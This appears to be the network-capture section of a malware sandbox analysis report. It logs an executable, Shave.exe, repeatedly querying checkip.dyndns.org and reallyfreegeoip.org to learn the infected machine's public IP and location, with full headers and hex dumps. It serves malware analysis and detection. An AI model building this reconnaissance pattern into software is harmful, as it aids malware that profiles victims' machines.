                                                                                                                              Nov 25, 2024 07:08:42.599217892 CET1236INData Raw: c6 e0 75 3b 82 a7 40 8c a6 46 74 54 e6 a1 00 62 9b 80 cf 5b ac 46 2f 4b 82 5d 3f 82 8c 50 8b 25 95 df 12 6f 20 eb 78 6e 7c 94 e5 b6 ab 2e 67 ba e6 5d ee 0c ed 4d 0d 8d fb 5c df 2f 74 63 a5 8a 99 39 66 d2 db 61 20 bb a1 84 4b 0f 58 fc 37 b6 f8 6c
                                                                                                                              Data Ascii: u;@FtTb[F/K]?P%o xn|.g]M\/tc9fa KX7lp!Ti(B|KX[]~/yqHTHFJ?<9%RjR?5!E7amK`]sW&s;+:n~0LnZo`Tce=oX]k\
                                                                                                                              Nov 25, 2024 07:08:42.599359989 CET492INData Raw: 35 63 5d 69 db 5a e2 f3 22 0c 54 7e bf 25 68 75 00 b5 5f 07 43 76 25 1a 57 dd ca ce 77 d4 10 c8 db bf a8 1a d0 2d cf 3c a4 cb f7 dc 5f f0 4d c4 3c 40 6b 3c 06 45 21 7e 1e e4 27 63 b8 70 0d 31 b4 22 82 48 6d 9d ec e5 43 71 2b bf 88 e6 a1 7a ba 1f
                                                                                                                              Data Ascii: 5c]iZ"T~%hu_Cv%Ww-<_M<@k<E!~'cp1"HmCq+zwTMK<d/?XpS]GZM16b-1ngCz3[ExIe&FW0xZ[Rc@9im5f5"#TwaW ^XFqVA1@CKaa+
                                                                                                                              Nov 25, 2024 07:08:42.599371910 CET1236INData Raw: c3 8a 04 f9 0e c0 3e 19 99 8b bd 0f 73 aa b3 36 f9 60 f0 fd 01 a5 94 77 85 57 a7 69 b7 a6 89 02 80 c6 f1 2f e1 6b 31 bc 61 91 3a 64 c4 d0 8d 45 b3 26 67 6e ca 55 bf f7 5b 04 6f 29 a3 60 54 1e a4 c7 c2 aa 6f cd 83 b9 b0 4b 9b d0 84 83 a2 36 a1 3d
                                                                                                                              Data Ascii: >s6`wWi/k1a:dE&gnU[o)`ToK6=1X$YdxHD,akijL; =WJ\OOT}\MGd2?-E)3}t>66*-kqtW|yi9lC%savsG
                                                                                                                              Nov 25, 2024 07:08:42.718547106 CET1236INData Raw: c6 74 47 32 b3 1f d6 8b 0a 61 78 ac 0f 64 3f ef d8 49 cd ae 68 3b 5c 8b 43 f1 7e 88 ae dc e2 6d 02 42 68 b6 b0 22 c7 d2 5b 28 a2 41 9c 89 fa a8 30 a0 eb fe bc 9a 80 c5 33 1c 97 3e ce 31 2b 46 8b 2b 91 e9 78 f5 e7 f1 c8 70 e9 73 56 8d 2a 20 27 da
                                                                                                                              Data Ascii: tG2axd?Ih;\C~mBh"[(A03>1+F+xpsV* '(^PDN)3>a!rFq@nSM=2)?;i+kgCXbV^&79Y3J.%-rhEvd=5ph6[X.PT2 T


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              1192.168.2.549757193.122.130.0807044C:\Users\user\Desktop\Shave.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Nov 25, 2024 07:08:44.617152929 CET151OUTGET / HTTP/1.1
                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                              Host: checkip.dyndns.org
                                                                                                                              Connection: Keep-Alive
                                                                                                                              Nov 25, 2024 07:08:48.664309978 CET320INHTTP/1.1 200 OK
                                                                                                                              Date: Mon, 25 Nov 2024 06:08:48 GMT
                                                                                                                              Content-Type: text/html
                                                                                                                              Content-Length: 103
                                                                                                                              Connection: keep-alive
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Pragma: no-cache
                                                                                                                              X-Request-ID: 637bb3c0f7bd0c1e99c8ee484ad404f7
                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>
                                                                                                                              Nov 25, 2024 07:08:48.668427944 CET127OUTGET / HTTP/1.1
                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                              Host: checkip.dyndns.org
                                                                                                                              Nov 25, 2024 07:08:49.011686087 CET320INHTTP/1.1 200 OK
                                                                                                                              Date: Mon, 25 Nov 2024 06:08:48 GMT
                                                                                                                              Content-Type: text/html
                                                                                                                              Content-Length: 103
                                                                                                                              Connection: keep-alive
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Pragma: no-cache
                                                                                                                              X-Request-ID: 48d4995d5b873d4bcc38127cd279f2dc
                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>
                                                                                                                              Nov 25, 2024 07:08:51.303636074 CET127OUTGET / HTTP/1.1
                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                              Host: checkip.dyndns.org
                                                                                                                              Nov 25, 2024 07:08:51.666965961 CET320INHTTP/1.1 200 OK
                                                                                                                              Date: Mon, 25 Nov 2024 06:08:51 GMT
                                                                                                                              Content-Type: text/html
                                                                                                                              Content-Length: 103
                                                                                                                              Connection: keep-alive
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Pragma: no-cache
                                                                                                                              X-Request-ID: 378e46364ff70cf5888eabcea837e10c
                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              2192.168.2.549779193.122.130.0807044C:\Users\user\Desktop\Shave.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Nov 25, 2024 07:08:53.514131069 CET127OUTGET / HTTP/1.1
                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                              Host: checkip.dyndns.org
                                                                                                                              Nov 25, 2024 07:08:57.096506119 CET320INHTTP/1.1 200 OK
                                                                                                                              Date: Mon, 25 Nov 2024 06:08:56 GMT
                                                                                                                              Content-Type: text/html
                                                                                                                              Content-Length: 103
                                                                                                                              Connection: keep-alive
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Pragma: no-cache
                                                                                                                              X-Request-ID: 084721cc87aafe471227f81ab403bda5
                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              3192.168.2.549796193.122.130.0807044C:\Users\user\Desktop\Shave.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Nov 25, 2024 07:08:59.003117085 CET151OUTGET / HTTP/1.1
                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                              Host: checkip.dyndns.org
                                                                                                                              Connection: Keep-Alive
                                                                                                                              Nov 25, 2024 07:09:00.533708096 CET320INHTTP/1.1 200 OK
                                                                                                                              Date: Mon, 25 Nov 2024 06:09:00 GMT
                                                                                                                              Content-Type: text/html
                                                                                                                              Content-Length: 103
                                                                                                                              Connection: keep-alive
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Pragma: no-cache
                                                                                                                              X-Request-ID: ddb07921a526f251d6430de4535bf447
                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>
                                                                                                                              Nov 25, 2024 07:09:01.034914970 CET320INHTTP/1.1 200 OK
                                                                                                                              Date: Mon, 25 Nov 2024 06:09:00 GMT
                                                                                                                              Content-Type: text/html
                                                                                                                              Content-Length: 103
                                                                                                                              Connection: keep-alive
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Pragma: no-cache
                                                                                                                              X-Request-ID: ddb07921a526f251d6430de4535bf447
                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              4192.168.2.549805193.122.130.0807044C:\Users\user\Desktop\Shave.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Nov 25, 2024 07:09:02.749855042 CET151OUTGET / HTTP/1.1
                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                              Host: checkip.dyndns.org
                                                                                                                              Connection: Keep-Alive
                                                                                                                              Nov 25, 2024 07:09:04.541706085 CET320INHTTP/1.1 200 OK
                                                                                                                              Date: Mon, 25 Nov 2024 06:09:04 GMT
                                                                                                                              Content-Type: text/html
                                                                                                                              Content-Length: 103
                                                                                                                              Connection: keep-alive
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Pragma: no-cache
                                                                                                                              X-Request-ID: 9f848a819bda500147e095beb9d08cbf
                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              5192.168.2.549816193.122.130.0807044C:\Users\user\Desktop\Shave.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Nov 25, 2024 07:09:06.439815998 CET151OUTGET / HTTP/1.1
                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                              Host: checkip.dyndns.org
                                                                                                                              Connection: Keep-Alive
                                                                                                                              Nov 25, 2024 07:09:10.335251093 CET320INHTTP/1.1 200 OK
                                                                                                                              Date: Mon, 25 Nov 2024 06:09:10 GMT
                                                                                                                              Content-Type: text/html
                                                                                                                              Content-Length: 103
                                                                                                                              Connection: keep-alive
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Pragma: no-cache
                                                                                                                              X-Request-ID: 2393ed1b596bf3a3ee0b165169551f7d
                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              6192.168.2.549830193.122.130.0807044C:\Users\user\Desktop\Shave.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Nov 25, 2024 07:09:12.230806112 CET151OUTGET / HTTP/1.1
                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                              Host: checkip.dyndns.org
                                                                                                                              Connection: Keep-Alive
                                                                                                                              Nov 25, 2024 07:09:16.540504932 CET320INHTTP/1.1 200 OK
                                                                                                                              Date: Mon, 25 Nov 2024 06:09:16 GMT
                                                                                                                              Content-Type: text/html
                                                                                                                              Content-Length: 103
                                                                                                                              Connection: keep-alive
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Pragma: no-cache
                                                                                                                              X-Request-ID: 56e3b21b44a663a4786ebe0992812929
                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              7192.168.2.549846193.122.130.0807044C:\Users\user\Desktop\Shave.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Nov 25, 2024 07:09:18.494518042 CET151OUTGET / HTTP/1.1
                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                              Host: checkip.dyndns.org
                                                                                                                              Connection: Keep-Alive
                                                                                                                              Nov 25, 2024 07:09:19.742892981 CET320INHTTP/1.1 200 OK
                                                                                                                              Date: Mon, 25 Nov 2024 06:09:19 GMT
                                                                                                                              Content-Type: text/html
                                                                                                                              Content-Length: 103
                                                                                                                              Connection: keep-alive
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Pragma: no-cache
                                                                                                                              X-Request-ID: 5dad7603f02d73d401758bbf75c5bfe2
                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              8192.168.2.549857193.122.130.0807044C:\Users\user\Desktop\Shave.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Nov 25, 2024 07:09:21.580137014 CET151OUTGET / HTTP/1.1
                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                              Host: checkip.dyndns.org
                                                                                                                              Connection: Keep-Alive
                                                                                                                              Nov 25, 2024 07:09:23.377048969 CET320INHTTP/1.1 200 OK
                                                                                                                              Date: Mon, 25 Nov 2024 06:09:23 GMT
                                                                                                                              Content-Type: text/html
                                                                                                                              Content-Length: 103
                                                                                                                              Connection: keep-alive
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Pragma: no-cache
                                                                                                                              X-Request-ID: 7cc40aa2ef76d8f87c1b2e6404545503
                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              0192.168.2.549771172.67.177.1344437044C:\Users\user\Desktop\Shave.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-11-25 06:08:50 UTC84OUTGET /xml/8.46.123.75 HTTP/1.1
                                                                                                                              Host: reallyfreegeoip.org
                                                                                                                              Connection: Keep-Alive
                                                                                                                              2024-11-25 06:08:51 UTC849INHTTP/1.1 200 OK
                                                                                                                              Date: Mon, 25 Nov 2024 06:08:51 GMT
                                                                                                                              Content-Type: text/xml
                                                                                                                              Content-Length: 361
                                                                                                                              Connection: close
                                                                                                                              Cache-Control: max-age=31536000
                                                                                                                              CF-Cache-Status: HIT
                                                                                                                              Age: 478840
                                                                                                                              Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT
                                                                                                                              Accept-Ranges: bytes
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LOyT5Izf5qc7hOPOwGMyiMTXC6kqU8a6MBKotay2ejOhAe0SF78qg1poP7tZ8MeiXqiVhGc2u1S37DHlAEBucKZavY6QYcqBPDggUMRH8SGycP8RCMXSJmR0%2BQ7sOH2H1%2FQDokdg"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8e7f776f7e9fc42c-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1484&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=698&delivery_rate=1883870&cwnd=225&unsent_bytes=0&cid=e7c68c7e87bec979&ts=468&x=0"
                                                                                                                              2024-11-25 06:08:51 UTC361INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e
                                                                                                                              Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              1192.168.2.549777172.67.177.1344437044C:\Users\user\Desktop\Shave.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-11-25 06:08:52 UTC60OUTGET /xml/8.46.123.75 HTTP/1.1
                                                                                                                              Host: reallyfreegeoip.org
                                                                                                                              2024-11-25 06:08:53 UTC847INHTTP/1.1 200 OK
                                                                                                                              Date: Mon, 25 Nov 2024 06:08:53 GMT
                                                                                                                              Content-Type: text/xml
                                                                                                                              Content-Length: 361
                                                                                                                              Connection: close
                                                                                                                              Cache-Control: max-age=31536000
                                                                                                                              CF-Cache-Status: HIT
                                                                                                                              Age: 478842
                                                                                                                              Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT
                                                                                                                              Accept-Ranges: bytes
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XyQxB22ADICPV%2Fx7cocJgaKHZnoUPo1gCvzpWMrgJIK5rDa2XR8LyL8cFhM8Ay7CgkfExwv37Ek4pZQHUKMTse8ClFCB6jaLEkIFiljGCFatLYqeR34G4edhblBpejX7gz7O0wH0"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8e7f777ca9cb7d20-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=2045&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=698&delivery_rate=1398467&cwnd=207&unsent_bytes=0&cid=5807caac191cbe08&ts=468&x=0"
                                                                                                                              2024-11-25 06:08:53 UTC361INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e
                                                                                                                              Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              2192.168.2.549790172.67.177.1344437044C:\Users\user\Desktop\Shave.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-11-25 06:08:58 UTC84OUTGET /xml/8.46.123.75 HTTP/1.1
                                                                                                                              Host: reallyfreegeoip.org
                                                                                                                              Connection: Keep-Alive
                                                                                                                              2024-11-25 06:08:58 UTC855INHTTP/1.1 200 OK
                                                                                                                              Date: Mon, 25 Nov 2024 06:08:58 GMT
                                                                                                                              Content-Type: text/xml
                                                                                                                              Content-Length: 361
                                                                                                                              Connection: close
                                                                                                                              Cache-Control: max-age=31536000
                                                                                                                              CF-Cache-Status: HIT
                                                                                                                              Age: 478847
                                                                                                                              Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT
                                                                                                                              Accept-Ranges: bytes
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rkERkAkMcrcTSSwehk4H%2FzCWeFBZThZhp4HPtfJDkNYbGbhieBcNhUdop5xHk%2BO%2BTHeEHiyadB0s1uY0cMH3gT%2FoRXXoBNpDpbVyEi4dpQi4Jhm8LdsQA%2BUlhIiCqB5KVBbdE6na"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8e7f779edf8341f9-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1722&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=698&delivery_rate=1622222&cwnd=212&unsent_bytes=0&cid=f9a37254760f0f28&ts=467&x=0"
                                                                                                                              2024-11-25 06:08:58 UTC361INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e
                                                                                                                              Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              3192.168.2.549801172.67.177.1344437044C:\Users\user\Desktop\Shave.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-11-25 06:09:02 UTC84OUTGET /xml/8.46.123.75 HTTP/1.1
                                                                                                                              Host: reallyfreegeoip.org
                                                                                                                              Connection: Keep-Alive
                                                                                                                              2024-11-25 06:09:02 UTC855INHTTP/1.1 200 OK
                                                                                                                              Date: Mon, 25 Nov 2024 06:09:02 GMT
                                                                                                                              Content-Type: text/xml
                                                                                                                              Content-Length: 361
                                                                                                                              Connection: close
                                                                                                                              Cache-Control: max-age=31536000
                                                                                                                              CF-Cache-Status: HIT
                                                                                                                              Age: 478851
                                                                                                                              Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT
                                                                                                                              Accept-Ranges: bytes
